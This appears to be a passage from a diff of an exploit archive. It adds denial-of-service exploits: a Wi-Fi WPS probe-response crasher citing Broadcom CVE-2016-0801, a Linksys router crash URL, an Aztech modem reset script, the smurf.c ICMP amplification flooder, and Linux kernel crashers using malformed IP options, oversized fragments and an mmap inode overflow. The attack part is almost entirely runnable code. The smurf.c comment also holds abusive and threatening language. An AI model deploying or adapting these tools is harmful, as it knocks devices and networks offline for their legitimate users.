u16 duration;
u8 dest[6];
u8 source[6];
u8 bssid[6];
u8 fragment_no;
u8 sequence_no;
};
/* Dynamic Tag */
struct ssid {
com_a head;
u8 *ssid;
};
/* Tagged Parameters */
struct Wifi_Tags {
struct {
com_a head;
u8 rates[4];
} rates;
struct {
com_a head;
u8 channel;
} ds;
struct {
com_a head;
u8 erp_info;
} erp_info;
/* Extended Support Rates */
struct {
com_a head;
u8 rates[8];
} esr;
struct {
com_a head;
u16 version;
/* Group Chipher Suite */
com_b gcp;
u16 pcs_count;
/* Pairwise Chipher Suite */
com_b pcs;
u16 akm_count;
/* Auth Key Management */
com_b akm;
u16 rsn;
} rsn_info;
struct {
com_a head;
com_b wpa_o;
u16 version;
/* Multi Chipher Suite */
com_b mcs;
u16 ucs_count;
/* Unicast Chipher Suite */
com_b ucs;
/* Auth Key Management */
u16 akm_count;
com_b akm;
} wpa;
struct {
com_a head;
u16 info;
u8 mpdu;
u8 scheme[16];
u16 capabilities;
u16 transmit;
u8 asel;
} ht_capabilites __attribute__((packed));
struct {
com_a head;
u8 channel;
u8 subset1;
u16 subset2;
u16 subset3;
u8 scheme[16];
} ht_info;
};
/*
* WPS Tag Probe Response
*/
struct WPSProbeRespIe {
com_a head;
com_b wps_o;
wtag_a version;
/* Wifi Protected Setup State */
wtag_a wpss;
/* Selected Registrar */
wtag_a sreg;
/* Device Password Id */
wtag_b dpi;
/* Selected Registrar Config Methods */
wtag_b srcm;
/* Response Type */
wtag_a resp;
/* uuid 16 byte */
wtag_c uuid;
/* Manufacturer */
wtag_c man;
/* Model Name */
wtag_c mname;
/* Model Number */
wtag_c numb;
/* Serial Number */
wtag_c serial;
/* Primary_device_type */
wtag_c dev_type;
/* Device Name */
wtag_c dname;
/* Config Methods */
wtag_b cmeth;
};
/* wtag_c pointer is address list from WPSProbeRespIE */
static long wtag_c_point[7];
/* Insert WPS Frames In Line With Types */
static void
inwps_a( wtag_a *tag, u16 det, u8 par )
{
tag->init.det = reverse16(det);
tag->init.del = reverse16(0x01);
tag->item = par;
}
static void
inwps_b( wtag_b *tag, u16 det, u16 par )
{
tag->init.det = reverse16(det);
tag->init.del = reverse16(0x02);
tag->item = reverse16(par);
}
static void
inwps_c( wtag_c *tag, u16 det, char *par )
{
static int counter = 0;
int i = strlen(par);
i = i > MAX_TL ? MAX_TL : i;
tag->item = ( char * ) calloc( i, sizeof(char) );
tag->init.det = reverse16(det);
tag->init.del = reverse16(i);
strncpy( tag->item, par, i );
wtag_c_point[counter++] = (long )(void *)&(tag->item);
}
/* Convert 'struct WPSProbeRespIe' to bytearray */
int
wtoa( char *pop, struct WPSProbeRespIe *tag )
{
unsigned char *a = (void *)tag;
char *tmp;
long tmp_a;
int i = 0, p = 0, co = 0, j;
int size = sizeof(struct WPSProbeRespIe);
while( p < size )
{
if( wtag_c_point[co] == (long)(a+p) ){
assert(co++ < 7);
tmp_a = 0;
for( j = 0; j < 32; j+=8 )
tmp_a |= *(a+p++)<<j;
tmp = (char *)tmp_a;
j = 0;
while( tmp[j] )
pop[i++] = tmp[j++];
#ifdef __x86_64__
p+=4;
#endif
free( tmp );
}else
pop[i++] = *(a+p++);
}
#ifdef DEBUG
printf("Total Wps Length: %d\n", i);
#endif
/* wps->head.tl */
pop[1] = i-2;
assert(i <= MAX_TL+1);
/* i is array length */
return( i );
}
struct WPSProbeRespIe *
set_wps_probe_response(void)
{
struct WPSProbeRespIe *wps = ( struct WPSProbeRespIe * ) \
malloc( sizeof(struct WPSProbeRespIe) );
char *uuid = calloc( MAX_TL, sizeof(char) );
char *manufacturer = calloc( MAX_TL, sizeof(char) );
char *model_name = calloc( MAX_TL, sizeof(char) );
char *model_number = calloc( MAX_TL, sizeof(char) );
char *serial_number = calloc( MAX_TL, sizeof(char) );
char *device_type = calloc( MAX_TL, sizeof(char) );
char *device_name = calloc( MAX_TL, sizeof(char) );
/*
* Fill them as you wish, but do NOT exceed
* 0xff (256 bytes) length
*/
memset( uuid, 'B', 16 );
memset( manufacturer, 'A', 8 );
memset( model_name, 'D', 8 );
memset( model_number, 'B', 8 );
memset( serial_number,'O', 8 );
memset( device_type, 'Y', 8 );
memset( device_name, 'S', 128 ); /* For Broadcom CVE-2016-0801 > 100 */
/* Tag Number Vendor Specific */
wps->head.tn = VENDOR_t;
/* The length will calculate after it packages */
wps->head.tl = 0x00;
/* OUI: Microsof */
memcpy( wps->wps_o.oui, OUI_Microsof, sizeof(OUI_Microsof));
wps->wps_o.type = 0x04;
inwps_a( &wps->version, VERSION, WV );
inwps_a( &wps->wpss, WPS_STATE, WS );
inwps_a( &wps->sreg, SELECTED_REGISTRAR, SR );
inwps_b( &wps->dpi, DEVICE_PASSWORD_ID, PIN );
inwps_b( &wps->srcm, SELECTED_REGISTRAR_CONFIG_METHODS, SRCM );
inwps_a( &wps->resp, RESPONSE_TYPE, RT );
inwps_c( &wps->uuid, UUID_E, uuid );
inwps_c( &wps->man, MANUFACTURER, manufacturer );
inwps_c( &wps->mname, MODEL_NAME, model_name );
inwps_c( &wps->numb, MODEL_NUMBER, model_number );
inwps_c( &wps->serial, SERIAL_NUMBER, serial_number );
inwps_c( &wps->dev_type, PRIMARY_DEVICE_TYPE, device_type );
inwps_c( &wps->dname, WPS_ID_DEVICE_NAME, device_name );
inwps_b( &wps->cmeth, CONFIG_METHODS, CM );
free( uuid );
free( manufacturer );
free( model_name );
free( model_number );
free( serial_number );
free( device_type );
free( device_name );
return( wps );
}
int
create_wifi(char *pop)
{
/*
* struct for radiotap_hdr and fixed_hdr are missing
*/
char radiotap_hdr[26];
char fixed_hdr[12];
struct ie80211_hdr *ie = calloc( sizeof(struct ie80211_hdr), 1 );
struct Wifi_Tags *tag = calloc( sizeof(struct Wifi_Tags), 1 );
struct ssid *ssid;
int i, len = 0;
memset( radiotap_hdr, 0, sizeof(radiotap_hdr) );
radiotap_hdr[2] = 26; /* Header Length */
memset( fixed_hdr, 'A', sizeof(fixed_hdr) );
ie->type = reverse8(PROBE_RESPONSE);
memcpy( ie->dest, DESTINATION_MAC, 6 );
memcpy( ie->source, SOURCE_MAC, 6 );
memcpy( ie->bssid, SOURCE_MAC, 6 );
i = strlen( SSID );
ssid = calloc( i+2, 1 );
ssid->head.tn = SSID_t;
ssid->head.tl = i;
ssid->ssid = calloc(i,1);
memcpy( ssid->ssid, SSID, i );
tag->rates.head.tn = RATES_t;
tag->rates.head.tl = calc_size(tag->rates);
memcpy(tag->rates.rates, RATES_v, sizeof(tag->rates.rates));
tag->ds.head.tn = DS_t;
tag->ds.head.tl = calc_size(tag->ds);
tag->ds.channel = 1;
tag->erp_info.head.tn = ERP_t;
tag->erp_info.head.tl = calc_size(tag->erp_info);
tag->erp_info.erp_info = 0x00;
tag->esr.head.tn = ESR_t;
tag->esr.head.tl = calc_size(tag->esr);
memcpy(tag->esr.rates, ESRATES_v, sizeof(tag->esr.rates));
tag->rsn_info.head.tn = RSN_t;
tag->rsn_info.head.tl = calc_size(tag->rsn_info);
tag->rsn_info.version = 1;
memcpy( tag->rsn_info.gcp.oui, OUI_AES, \
sizeof(tag->rsn_info.gcp.oui) );
tag->rsn_info.gcp.type = 0x04; /* AES(CCM) */
tag->rsn_info.pcs_count = 1;
memcpy( tag->rsn_info.pcs.oui, OUI_AES, \
sizeof(tag->rsn_info.pcs.oui) );
tag->rsn_info.pcs.type = 0x04; /* AES(CCM) */
tag->rsn_info.akm_count = 1;
memcpy( tag->rsn_info.akm.oui, OUI_AES, \
sizeof(tag->rsn_info.akm.oui) );
tag->rsn_info.pcs.type = 0x02;
tag->rsn_info.rsn = 0x0000;
tag->wpa.head.tn = VENDOR_t;
tag->wpa.head.tl = calc_size(tag->wpa);
memcpy( tag->wpa.wpa_o.oui, OUI_Microsof, \
sizeof(tag->wpa.wpa_o.oui) );
tag->wpa.wpa_o.type = 1;
tag->wpa.version = 1;
memcpy( tag->wpa.mcs.oui, OUI_Microsof, \
sizeof(tag->wpa.mcs.oui) );
tag->wpa.mcs.type = 0x04;
tag->wpa.ucs_count = 1;
memcpy( tag->wpa.ucs.oui, OUI_Microsof, \
sizeof(tag->wpa.ucs.oui) );
tag->wpa.ucs.type = 0x04;
tag->wpa.akm_count = 1;
memcpy( tag->wpa.akm.oui, OUI_Microsof, \
sizeof(tag->wpa.akm.oui) );
tag->wpa.akm.type = 0x02;
tag->ht_capabilites.head.tn = HTC_t;
tag->ht_capabilites.head.tl = calc_size(tag->ht_capabilites);
tag->ht_capabilites.info = 0x104e;
tag->ht_capabilites.mpdu = 0x1f;
tag->ht_capabilites.scheme[0] = 0xff;
tag->ht_capabilites.scheme[1] = 0xff;
tag->ht_capabilites.capabilities = 0x0004;
tag->ht_info.head.tn = HTI_t;
tag->ht_info.head.tl = calc_size(tag->ht_info);
tag->ht_info.channel = 11;
tag->ht_info.subset1 = 0x07;
tag->ht_info.subset2 = 0x0001;
tag->ht_info.scheme[0] = 0x0f;
memcpy( pop, radiotap_hdr, sizeof(radiotap_hdr) );
memcpy( &pop[len+=sizeof(radiotap_hdr)], \
(u8 *)ie, sizeof(struct ie80211_hdr) );
memcpy( &pop[len+=sizeof(struct ie80211_hdr)], \
fixed_hdr, sizeof(fixed_hdr) );
memcpy( &pop[len+=sizeof(fixed_hdr)], \
(u8 *)&ssid->head, 2 );
memcpy( &pop[len+=2], ssid->ssid, i );
memcpy( &pop[len+=i], (u8 *) tag, \
sizeof(struct Wifi_Tags) );
len+=sizeof(struct Wifi_Tags);
free( ssid );
free( tag );
free( ie );
return (len);
}
int
broadcast(char *packet, int len)
{
struct sockaddr_ll sll;
struct ifreq ifr;
struct iwreq iwr;
int sock, ret, count = 100;
sock = socket( AF_PACKET, SOCK_RAW, 0x300 );
if(sock < 0){
perror("socket() failed");
exit(EXIT_FAILURE);
}
memset( &ifr, 0, sizeof(ifr) );
strncpy( ifr.ifr_name, IFACE, sizeof(ifr.ifr_name) );
if( ioctl( sock, SIOCGIFINDEX, &ifr ) < 0 ){
perror( "ioctl(SIOCGIFINDEX) failed" );
close(sock);
exit(EXIT_FAILURE);
}
memset( &sll, 0, sizeof(sll) );
sll.sll_family = AF_PACKET;
sll.sll_ifindex = ifr.ifr_ifindex;
if( ioctl( sock, SIOCGIFHWADDR, &ifr ) < 0 )
{
perror( "ioctl(SIOCGIFHWADDR) failed" );
close(sock);
exit(EXIT_FAILURE);
}
memset( &iwr, 0, sizeof( struct iwreq ) );
strncpy( iwr.ifr_name, IFACE, IFNAMSIZ );
if( ioctl( sock, SIOCGIWMODE, &iwr ) < 0 )
iwr.u.mode = IW_MODE_MONITOR;
ifr.ifr_flags |= IFF_UP | IFF_BROADCAST | IFF_RUNNING;
if ( (ioctl(sock, SIOCGIFFLAGS, &ifr)) < 0 ){
perror("ioctl(SIOCGIFFLAGS) failed");
close(sock);
exit(EXIT_FAILURE);
}
if( bind( sock, (struct sockaddr *) &sll,
sizeof( sll ) ) < 0 )
{
perror( "bind() failed" );
close(sock);
exit(EXIT_FAILURE);
}
while( count-- ){
#ifdef SHOW
int i;
printf("\n\033[34m [\033[31m%d\033[34m] \033[33m", count);
printf("\tSSID: %s\n", SSID);
printf("\tDEST: ");
for(i=0;i<6;i++)
printf("%02x ", DESTINATION_MAC[i]&0xff);
printf("\n\tSending Packet (%d byte) ...\033[0m\n", len);
#endif
ret = write( sock, packet, len );
if( ret < 0 ){
perror("write() failed");
close( sock );
exit(EXIT_FAILURE);
}
usleep( DELAY );
}
return 0;
}
int
main(void)
{
char *packet = (char *) calloc( MAX_SIZE, sizeof(char) );
struct WPSProbeRespIe *wps;
int len;
len = create_wifi( packet );
wps = set_wps_probe_response();
len += wtoa( &packet[len], wps );
broadcast( packet, len );
free( wps );
free( packet );
return 0;
}

7
platforms/hardware/dos/38493.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59445/info
The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.
Successful exploits will cause the device to crash, denying service to legitimate users.
http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1

44
platforms/hardware/dos/39315.pl Executable file
View file

@ -0,0 +1,44 @@
/*
source: http://www.securityfocus.com/bid/69809/info
Multiple Aztech routers are prone to a denial-of-service vulnerability.
Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition.
Aztech DSL5018EN, DSL705E and DSL705EU are vulnerable.
*/
#!/usr/bin/perl
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "---------------------------------------------\n";
print "++ Aztech Modem Denial of Service Attack\n";
print "++ Usage: perl $0 TARGET:PORT\n";
print "++ Ex: perl $0 192.168.254.254:80\n\n";
exit;
}
my $TARGET = $ARGV[0];
my ($HOST, $PORT)= split(':',$TARGET);
my $PATH = "%2f%63%67%69%2d%62%69%6e%2f%41%5a%5f%52%65%74%72%61%69%6e%2e%63%67%69";
system ('clear');
print "---------------------------------------------\n";
print "++ Resetting WAN modem $TARGET\n";
my $POST = "GET $PATH HTTP/1.1";
my $ACCEPT = "Accept: text/html";
my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;
print $sock "$POST\n";
print $sock "$ACCEPT\n\n";
print "++ Sent. The modem should be disconnected by now.\n";
$sock->close();
exit;

230
platforms/linux/dos/19117.c Executable file
View file

@ -0,0 +1,230 @@
source: http://www.securityfocus.com/bid/147/info
The "Smurf" denial of service exploits the existance, and forwarding of, packets sent to IP broadcast addreses. By creating an ICMP echo request packet, with the source address set to an IP within the network to be attacked, and the destination address the IP broadcast address of a network which will forward and respond to ICMP echo packets sent to broadcast. Each packet sent in to the network being used to conduct the attack will be responded to by any machine which will respond to ICMP on the broadcast address. Therefore, a single packet can result in an overwhelming response count, all of which are directed to the network the attacker has forged as the source. This can result in significant bandwidth loss.
/*
*
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
*
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
*
* mad head to:
* nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,
* MissSatan for swallowing, napster for pimping my sister, the guy that
* invented vaseline, fyber for trying, knowy, old school #havok, kain
* cos he rox my sox, zuez, toxik, robocod, and everyone else that i might
* have missed (you know who you are).
*
* hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
* thing he is (he's -almost- as stubborn as me, still i managed to pick up
* half the cheque).
*
* and a special hi to Todd, face it dude, you're fucking awesome.
*
* mad anal to:
* #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps
* because they plain suck, Rolex for being a twit, everyone that
* trades warez, Caren for being a lesbian hoe, AcidKill for being her
* partner, #cha0s, sedriss for having an ego in inverse proportion to
* his penis and anyone that can't pee standing up -- you don't know what
* your missing out on.
*
* and anyone thats ripped my code (diff smurf.c axcast.c is rather
* interesting).
*
* and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill
* Robbins for trying to steal my girlfriend. Not only did you show me
* no respect but you're a manipulating prick who tried to take away the
* most important thing in the world to me with no guilt whatsoever, and
* for that I wish you nothing but pain. Die.
*
* disclaimer:
* I cannot and will not be held responsible nor legally bound for the
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Don't abuse this.
*
* Well, i really, really, hate this code, but yet here I am creating another
* disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* like most programmers don't like seeing bugs in their code. I saw a few
* things that should have been done better or needed fixing so I fixed
* them. -shrug-, programming for me as always seemed to take the pain away
* ...
*
*
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);
/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf[32], **bcastaddr = malloc(8192);
banner();
signal(SIGINT, ctrlc);
if (argc < 6) usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {
perror("resolving source host");
exit(-1);
}
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);
if ((bcastfile = fopen(argv[2], "r")) == NULL) {
perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);
if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
for (i = 0; i < num || !num; i++) {
if (!(i % 25)) { printf("."); fflush(stdout); }
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0) cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}
void banner (void)
{
puts("\nsmurf.c v4.0 by TFreak\n");
}
void usage (char *prog)
{
fprintf(stderr, "usage: %s <target> <bcast file> "
"<num packets> <packet delay> <packet size>
\n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp;
char *packet;
packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)
;
ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize
);
sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
free(packet); /* free willy! */
}
void ctrlc (int ignored)
{
puts("\nDone!\n");
exit(1);
}
unsigned short in_chksum (u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

124
platforms/linux/dos/19241.c Executable file
View file

@ -0,0 +1,124 @@
/*
source: http://www.securityfocus.com/bid/302/info
A vulnerability in the Linux Kernel's IPv4 option processing may allow a remote user to crash the system.
The vulnerability is the result of the kernel freeing a socket buffer when it shouldn't while sending an ICMP Parameter Problem error message in response to an IP packet with a malformed IP option. This results in the buffer being freed twice and in memory corruption.
Of the Debian Linux 2.1 supported architectures only the SPARC one is vulnerable.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
struct icmp_hdr
{
struct iphdr iph;
struct icmp icp;
char text[1002];
} icmph;
int in_cksum(int *ptr, int nbytes)
{
long sum;
u_short oddbyte, answer;
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1)
{
oddbyte = 0;
*((u_char *)&oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
struct sockaddr_in sock_open(char *address, int socket, int prt)
{
struct hostent *host;
if ((host = gethostbyname(address)) == NULL)
{
perror("Unable to get host name");
exit(-1);
}
struct sockaddr_in sin;
bzero((char *)&sin, sizeof(sin));
sin.sin_family = PF_INET;
sin.sin_port = htons(prt);
bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
return(sin);
}
void main(int argc, char **argv)
{
int sock, i, ctr, k;
int on = 1;
struct sockaddr_in addrs;
if (argc < 3)
{
printf("Usage: %s <ip_addr> <port>\n", argv[0]);
exit(-1);
}
for (i = 0; i < 1002; i++)
{
icmph.text[i] = random() % 255;
}
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("Can't set IP_HDRINCL option on socket");
}
if (sock < 0)
{
exit(-1);
}
fflush(stdout);
for (ctr = 0;ctr < 1001;ctr++)
{
ctr = ctr % 1000;
addrs = sock_open(argv[1], sock, atoi(argv[2]));
icmph.iph.version = 4;
icmph.iph.ihl = 6;
icmph.iph.tot_len = 1024;
icmph.iph.id = htons(0x001);
icmph.iph.ttl = 255;
icmph.iph.protocol = IPPROTO_ICMP;
icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
((random() % 255) * 65535) +
((random() % 255) * 255) +
(random() % 255);
icmph.iph.daddr = addrs.sin_addr.s_addr;
icmph.iph.frag_off = htons(0);
icmph.icp.icmp_type = random() % 14;
icmph.icp.icmp_code = random() % 10;
icmph.icp.icmp_cksum = 0;
icmph.icp.icmp_id = 2650;
icmph.icp.icmp_seq = random() % 255;
icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs,sizeof(struct sockaddr)) == -1)
{
if (errno != ENOBUFS) printf("X");
}
if (ctr == 0) printf("b00m ");
fflush(stdout);
}
close(sock);
}

153
platforms/linux/dos/19301.c Executable file
View file

@ -0,0 +1,153 @@
/*
source: http://www.securityfocus.com/bid/376/info
Linux kernel 2.0.33 is vulnerable to a denial of service attack related to overlapping IP fragments. The bug is not in the handling of them itself, but the action taken when an oversized packet is recieved. A printk function is called containing a variable without any sort of wrapping or protection in function ip_glue. The consequences of this are a serious remote denial of service [ie, reboot of machine].
*/
// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x1c
#define MAGIC 0x3
#define COUNT 0xBEEF
#define FRAG2 0xFFFF
void usage(char *name) {
fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ]\n",name);
exit(0);
}
u_long name_resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr=inet_addr(host_name))==-1) {
if (!(host_ent=gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
}
return (addr.s_addr);
}
void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
u_char *packet=NULL,*p_ptr=NULL;
u_char byte;
struct sockaddr_in sin;
sin.sin_family=AF_INET;
sin.sin_port=src_prt;
sin.sin_addr.s_addr=dst_ip;
packet=(u_char *)malloc(IPH+UDPH+PADDING);
p_ptr=packet;
bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
byte=0x45;
memcpy(p_ptr,&byte,sizeof(u_char));
p_ptr+=2;
*((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
p_ptr+=2;
*((u_short *)p_ptr)=htons(242);
p_ptr+=2;
*((u_short *)p_ptr)|=htons(IP_MF);
p_ptr+=2;
*((u_short *)p_ptr)=0x40;
byte=IPPROTO_UDP;
memcpy(p_ptr+1,&byte,sizeof(u_char));
p_ptr+=4;
*((u_long *)p_ptr)=src_ip;
p_ptr+=4;
*((u_long *)p_ptr)=dst_ip;
p_ptr+=4;
*((u_short *)p_ptr)=htons(src_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(dst_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(8+PADDING);
if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr=&packet[2];
*((u_short *)p_ptr)=htons(IPH+MAGIC+1);
p_ptr+=4;
*((u_short *)p_ptr)=htons(FRAG2);
if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
int main(int argc, char **argv) {
int one=1,count=0,i,rip_sock;
u_long src_ip=0,dst_ip=0;
u_short src_prt=0,dst_prt=0;
struct in_addr addr;
fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc < 2) usage(argv[0]);
if (!(dst_ip=name_resolve(argv[1]))) {
fprintf(stderr,"Can't resolve destination address.\n");
exit(1);
}
while ((i=getopt(argc,argv,"s:n:"))!=EOF) {
switch (i) {
case 'n':
count = atoi(optarg);
break;
case 's':
if (!(src_ip=name_resolve(optarg))) {
fprintf(stderr,"Can't resolve source address.\n");
exit(1);
}
break;
default:
usage(argv[0]);
break;
}
}
srandom((unsigned)(time((time_t)0)));
if (!count) count=COUNT;
fprintf(stderr,"Sending oversized packets:\nFrom: ");
if (!src_ip) fprintf(stderr," (random)"); else {
addr.s_addr = src_ip;
fprintf(stderr,"%15s",inet_ntoa(addr));
}
addr.s_addr = dst_ip;
fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr));
fprintf(stderr," Amt: %5d\n",count);
fprintf(stderr,"[ ");
for (i=0;i<count;i++) {
if (!src_ip) send_frags(rip_sock,rand(),dst_ip,rand(),rand()); else
send_frags(rip_sock,src_ip,dst_ip,rand(),rand());
fprintf(stderr, "b00z ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}

33
platforms/linux/dos/19308.c Executable file
View file

@ -0,0 +1,33 @@
/*
source: http://www.securityfocus.com/bid/388/info
The i_count member in the Linux inode structure is an unsigned short integer. It can be overflowed by mapping a single file too many times, allowing for a local user to possibly gain root access on the target machine or cause a denial of service.
Below is a short example of how this vulnerability can be exploited:
*/
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main()
{
int fd, i;
fd = open("/lib/libc.so.5", O_RDONLY);
for(i = 0; i < 65540; i++)
{
mmap((char*)0x50000000 + (0x1000 * i), 0x1000,
PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}

50
platforms/linux/dos/19675.c Executable file
View file

@ -0,0 +1,50 @@
/*
source: http://www.securityfocus.com/bid/870/info
Debian 2.1,Linux kernel 2.0.34/2.0.35/2.0.36/2.0.37/2.0.38,RedHat 5.2 i386 Packet Length with Options Vulnerability
A vulnerability in the Linux kernel's TCP/IP allows local users to crash, hang or corrupt the system.
